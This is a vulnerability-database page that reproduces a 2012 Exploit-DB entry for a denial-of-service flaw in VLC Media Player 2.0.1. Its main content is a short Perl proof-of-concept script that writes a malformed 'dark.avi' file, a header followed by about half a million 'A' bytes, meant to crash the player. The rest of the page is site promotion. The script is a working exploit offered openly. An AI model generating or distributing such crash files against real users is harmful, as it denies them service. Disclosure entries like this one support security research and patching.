Lucene search
+L

VideoLAN VLC Media Player 2.0.1 - '.avi' File Denial of Service

🗓️ 28 Jun 2012 00:00:00Reported by Dark-PuzzleType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 17 Views

Vulnerability in VideoLAN VLC Media Player 2.0.1 '.avi' Fil

Code
source: https://www.securityfocus.com/bid/54208/info

VLC Media Player is prone to a denial-of-service vulnerability.

Successful exploits may allow attackers to crash the affected application, denying service to legitimate users.

#!/usr/bin/perl
my $h ="\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00";
my $d = "\x41" x 500429 ;


my $file = "dark.avi";

open ($File, ">$file");
print $File $h,$d;
close ($File);

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

23 Nov 2016 00:00Current
5.3Medium risk
Vulners AI Score5.3
17